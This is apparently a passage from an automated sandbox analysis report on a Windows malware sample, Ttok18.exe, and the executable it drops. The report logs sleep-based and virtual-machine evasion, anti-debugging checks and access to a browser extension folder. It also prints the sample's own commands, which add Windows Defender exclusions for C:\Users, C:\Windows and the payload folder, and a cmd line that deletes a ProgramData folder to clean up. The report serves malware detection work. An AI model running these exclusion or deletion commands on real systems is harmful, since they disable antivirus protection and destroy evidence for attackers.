            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -99063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -98953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -98842s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -98735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -98625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -98515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -98406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -98297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -98187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -98078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -97969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -97860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -97735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -97610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -97485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -97360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -97235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -97110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -96985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -96860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -96735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -96610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -96485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -96360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -96235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -96110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -95984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -95875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -95765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -95656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -95547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -95438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -95328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -95219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -95094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -94985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -94860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -94735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -94610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -94485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -94360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104Thread sleep time: -597016s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep count: 997 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep count: 426 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6892Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep count: 7805 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep count: 1806 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep count: 1220 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep count: 703 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 8017 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 1575 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 1081 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 269 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 6238 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 3509 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 5432Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\timeout.exe TID: 1464Thread sleep count: 90 > 30
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043A0AE FindFirstFileA,15_2_0043A0AE
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0041E359 FindFirstFileA,FindFirstFileA,15_2_0041E359
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00420370 FindFirstFileA,FindFirstFileA,15_2_00420370
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004028FC FindFirstFileA,15_2_004028FC
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0042498B FindFirstFileA,FindFirstFileA,15_2_0042498B
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043CE58 FindFirstFileA,15_2_0043CE58
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004390C5 FindFirstFileA,memset,memset,15_2_004390C5
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0043B345 wsprintfA,wsprintfA,FindFirstFileA,15_2_0043B345
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00421F18 FindFirstFileA,15_2_00421F18
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00402AA5 FindFirstFileA,15_2_00402AA5
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004214F2 FindFirstFileA,FindFirstFileA,15_2_004214F2
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_00439CA9 GetLogicalDriveStringsA,15_2_00439CA9
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004319C9 GetSystemInfo,15_2_004319C9
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 99797Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 99672Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 99563Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 99438Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 99313Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 99188Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 99063Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 98953Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 98842Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 98735Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 98625Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 98515Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 98406Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 98297Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 98187Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 98078Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 97969Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 97860Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 97735Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 97610Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 97485Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 97360Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 97235Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 97110Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 96985Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 96860Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 96735Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 96610Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 96485Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 96360Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 96235Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 96110Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 95984Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 95875Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 95765Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 95656Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 95547Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 95438Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 95328Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 95219Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 95094Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 94985Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 94860Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 94735Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 94610Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 94485Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 94360Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: Ttok18.exe, 00000000.00000002.1995156479.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: VMwareVMware
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.000000000086A000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2956431240.000002A458458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2955165395.000002A452E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Ttok18.exe, 00000000.00000002.1995156479.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040168C mov eax, dword ptr fs:[00000030h]15_2_0040168C
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004016AA test dword ptr fs:[00000030h], 00000068h15_2_004016AA
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004016BB mov eax, dword ptr fs:[00000030h]15_2_004016BB
            Source: C:\Users\user\Desktop\Ttok18.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeE
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'"Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeEJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\UsersJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'"Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe "C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeEJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\UsersJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\WindowsJump to behavior
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQIE37YCBIM" & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: GetLocaleInfoA,15_2_004316FE
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\Desktop\Ttok18.exeQueries volume information: C:\Users\user\Desktop\Ttok18.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
